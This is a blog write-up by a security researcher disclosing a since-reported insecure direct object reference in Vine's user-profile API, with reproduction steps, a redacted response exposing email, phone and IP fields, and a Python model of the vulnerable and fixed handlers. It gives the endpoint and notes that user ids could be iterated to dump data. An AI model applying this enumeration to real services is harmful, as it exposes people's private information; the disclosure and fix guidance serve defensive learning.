Vine User Private Information Disclosure – BugBountyPOC

This post is published by Prial Islam as a contributor on BugBountyPOC. Note that the post is written by Prial Islam, and any mistake in the writing is his alone. We allow anyone to write content on our blog as a guest/contributor so that others can also learn. If you are interested in sharing your findings through the Bug Bounty POC platform, just sign up on the blog and you can post freely.

Hello BugBountyPOC viewers, this is Prial Islam, a security researcher from Bangladesh. This is my first write-up, so I hope you will forgive any mistakes.

Today I will write about a critical information disclosure vulnerability that allowed me to obtain any Vine user's sensitive information, including their IP address, phone number and email.

I reported this bug to the Twitter security team through their bug bounty program on HackerOne, and they rewarded me with $7,560 for the report. Vine issued a statement about this vulnerability on the Vine blog, and HackerOne also mentioned it in the HackerOne Zero Daily newsletter.

  • Vulnerable endpoint: https://vine.co/api/users/profiles/<User Id>

While testing Vine's domains for anything interesting, I noticed that this endpoint returned my account's complete record. At first I took that to be normal, since many sites have an endpoint that returns the logged-in user's information. My next thought was to try to exploit it through CORS in case the policy was misconfigured, but the CORS policy was in place. Then I changed the user id value in the URL to another user's id, and to my surprise that user's full record came back. By changing the user id value I could retrieve any Vine user's complete record: the endpoint trusts the id in the URL and never checks it against the account making the request, a classic insecure direct object reference.

Reproduce:

  • Choose any user whose information you want and collect their user id.

  • Put that user id in the endpoint below and visit it. The full record comes back in the response body.

https://vine.co/api/users/profiles/<User Id>

Response:

```json
{
  "code": "",
  "data": {
    "followerCount": 16271364,
    "includePromoted": 1,
    "captchaSucceeded": 0,
    "recordComment": null,
    "locale": "iUS",
    "shareUrl": "https://vine.co/████████",
    "hiddenPhoneNumber": 0,
    "notPorn": 0,
    "userId": █████████,
    "private": 0,
    "likeCount": null,
    "commentCount": null,
    "platforms": ["android", "ios"],
    "postCount": null,
    "profileBackground": "0x33ccbf",
    "suspended": null,
    "hiddenFacebook": 0,
    "verifiedEmail": 0,
    "explicitContent": 0,
    "dmcaStrikeCount": 0,
    "flaggedCount": 7579,
    "verified": 1,
    "loopCount": 6132344784,
    "avatarUrl": "http://v.cdn.vine.co/r/avatars/████████████████████████████████████████.jpg?versionId=JIjnvXTkbWpjvk7glYZIXDqt187couHr",
    "authoredPostCount": 598,
    "review_result_illegal_review": 0,
    "review_result_ok": 0,
    "review": null,
    "suspendedBy": null,
    "twitterId": ████████,
    "phoneNumber": "██████████",
    "location": "Los Angeles California",
    "notifyActivity": 1,
    "facebookConnected": 1,
    "explicitContentAdmin": 0,
    "statsTags": null,
    "hiddenEmail": 0,
    "unflaggable": 0,
    "username": "████████",
    "modified": "2017-01-29T01:24:00.000000",
    "userIdStr": "████████",
    "twitterIdStr": "████████",
    "vanityUrls": ["kingbach"],
    "remixDisabled": 0,
    "deleted": null,
    "categories": null,
    "released": 0,
    "loopVelocity": null,
    "strikeCounts": [
      {"count": 0, "strikeType": "SEVERE_POLICY_VIOLATION"},
      {"count": 0, "strikeType": "DMCA"},
      {"count": 0, "strikeType": "SENSITIVE"},
      {"count": 0, "strikeType": "POSSIBLY_ILLEGAL"},
      {"count": 0, "strikeType": "GRAPHIC_NON_VIOLATING"},
      {"count": 0, "strikeType": "ESC"}
    ],
    "uploadHD": 1,
    "verifiedPhoneNumber": 1,
    "hiddenTwitter": 0,
    "vineVerified": 1,
    "notifyMessages": 1,
    "needsPhoneVerification": 0,
    "repostCount": null,
    "twitterScreenname": "██████",
    "secondaryColor": "0x33ccbf",
    "twitterVerified": 1,
    "captchaRequired": 0,
    "edition": null,
    "acceptsOutOfNetworkConversations": 1,
    "disableAddressBook": 1,
    "description": "Instagram/Twitter/Shots/SnapChat- @███ For booking go to the library",
    "escStrikeCount": 0,
    "review_result_explicit": 0,
    "notificationsLastViewed": "2016-04-26T21:03:35.000000",
    "email": "████████",
    "hideFromPopular": 0,
    "admin": 0,
    "contentReview": 0,
    "created": "2013-04-13T19:30:31.000000",
    "review_result_illegal_confirmed": 0,
    "followingCount": null,
    "lastLogin": "2016-12-13T23:29:40.000000",
    "escUser": 0,
    "ipAddress": "██████",
    "twitterConnected": 1
  },
  "success": true,
  "error": ""
}
```

 

Take a closer look at the response and you will find a lot of private information about the user. Some of it:

```
"platforms": ["android", "ios"]
"flaggedCount": 7579
"twitterId": "█████████"
"phoneNumber": "█████"
"location": "Los Angeles California"
"modified": "2017-01-29T01:24:00.000000"
"notificationsLastViewed": "2016-04-26T21:03:35.000000"
"email": "█████████"
"created": "2013-04-13T19:30:31.000000"
"lastLogin": "2016-12-13T23:29:40.000000"
"ipAddress": "█████"
```

Even the ipAddress, email and phone number are disclosed, and the rest of the record is the account's internal state rather than a public profile: moderation flags and strike counts, whether the phone number is verified, the devices used, and the time of the last login. With nothing more than a user id, an attacker can pull this for any account and use it for targeted attacks against that user, or iterate over user ids and dump information on the entire user base.
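The two defects behind this finding are separate: the handler never checks whose record the id in the URL refers to, and it serializes the whole database row instead of a deliberate public projection. The following is an added example (not Vine's code, and not from this post's author) that models the reproduction steps above against a tiny in-memory profile table. The table, the handler names get_profile_vulnerable and get_profile_fixed, the field tiers and the leaked_fields triage helper are all constructed for illustration; the field names are taken from the response on this page, the values are placeholders.

```python
"""Added example, not Vine's code: a minimal model of the profile endpoint
showing the authorization bug described in the write-up and one way to fix it.

Assumptions (constructed for illustration, not taken from Vine):
- USERS stands in for the profile table; keys are userId values.
- get_profile_vulnerable / get_profile_fixed are hypothetical handlers.
- The public / owner-only / internal field tiers are an assumed policy.
"""
from copy import deepcopy

# Constructed sample records. Field names follow the page's response,
# values are invented.
USERS = {
    1001: {
        "userId": 1001, "username": "alice", "verified": 1,
        "followerCount": 42, "location": "Dhaka",
        "description": "test account", "avatarUrl": "https://cdn.example/a.jpg",
        "email": "alice@example.com", "phoneNumber": "+8801000000000",
        "notifyActivity": 1, "twitterId": 5551,
        "ipAddress": "203.0.113.7", "lastLogin": "2017-01-01T00:00:00",
        "flaggedCount": 3, "dmcaStrikeCount": 0, "review": None,
    },
    1002: {
        "userId": 1002, "username": "bob", "verified": 0,
        "followerCount": 7, "location": "Los Angeles California",
        "description": "", "avatarUrl": "https://cdn.example/b.jpg",
        "email": "bob@example.com", "phoneNumber": "+14155550100",
        "notifyActivity": 0, "twitterId": 5552,
        "ipAddress": "198.51.100.23", "lastLogin": "2016-12-13T23:29:40",
        "flaggedCount": 7579, "dmcaStrikeCount": 1, "review": None,
    },
}

# Projection tiers (assumed policy). Anything in neither set is internal
# state (moderation counters, ipAddress, lastLogin, ...) and never leaves
# the server through this endpoint, not even to the account owner.
PUBLIC_FIELDS = frozenset({"userId", "username", "verified", "followerCount",
                           "location", "description", "avatarUrl"})
OWNER_ONLY_FIELDS = frozenset({"email", "phoneNumber", "notifyActivity",
                               "twitterId"})


def _envelope(data):
    """Mimic the response envelope seen on the page."""
    return {"code": "", "data": data, "success": True, "error": ""}


def get_profile_vulnerable(session_user_id, requested_user_id):
    """The bug as written up: the caller has a session, but the handler
    never asks whose row it is serving and returns the whole row."""
    if session_user_id not in USERS:
        return 401, {"success": False, "error": "login required"}
    row = USERS.get(requested_user_id)
    if row is None:
        return 404, {"success": False, "error": "no such user"}
    return 200, _envelope(deepcopy(row))


def get_profile_fixed(session_user_id, requested_user_id):
    """Object-level authorization plus an allow-list projection: the
    requester's relationship to the row decides which fields are copied
    out, and internal fields are never copied at all."""
    if session_user_id not in USERS:
        return 401, {"success": False, "error": "login required"}
    row = USERS.get(requested_user_id)
    if row is None:
        return 404, {"success": False, "error": "no such user"}
    allowed = PUBLIC_FIELDS
    if requested_user_id == session_user_id:
        allowed = PUBLIC_FIELDS | OWNER_ONLY_FIELDS
    return 200, _envelope({k: row[k] for k in row if k in allowed})


def leaked_fields(response, requester_is_owner):
    """Triage helper: which fields in a profile response should not have
    been returned to this requester? Run it on a response for your own id
    and on one for someone else's id; any non-public key in the second
    response is the finding."""
    allowed = PUBLIC_FIELDS | (OWNER_ONLY_FIELDS if requester_is_owner
                               else frozenset())
    data = response.get("data") or {}
    return sorted(k for k in data if k not in allowed)


if __name__ == "__main__":
    # alice (1001) requests bob's (1002) profile from both handlers.
    _, vuln = get_profile_vulnerable(1001, 1002)
    _, fixed = get_profile_fixed(1001, 1002)
    print("vulnerable leaks:", leaked_fields(vuln, requester_is_owner=False))
    print("fixed leaks:     ", leaked_fields(fixed, requester_is_owner=False))
```

The important design choice is that the fixed handler builds the response from an allow-list keyed on who is asking, rather than copying the row and deleting a few known-sensitive keys; with a deny-list, every new column added to the user table (a new moderation flag, a new verification field) leaks by default.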

This also affects Twitter users, since Vine users can log in to Vine with their Twitter account, and the record carries the linked twitterId and twitterScreenname. I also recorded a video PoC of this vulnerability. I found the same vulnerability in another bug bounty program, on the Edmodo website, and the video PoC for that one is on my channel.

Thanks for reading. Happy hunting.

Prial Islam

Security researcher from Bangladesh.


3 Responses

  1. Mahad Ahmed says:

    Nice find!

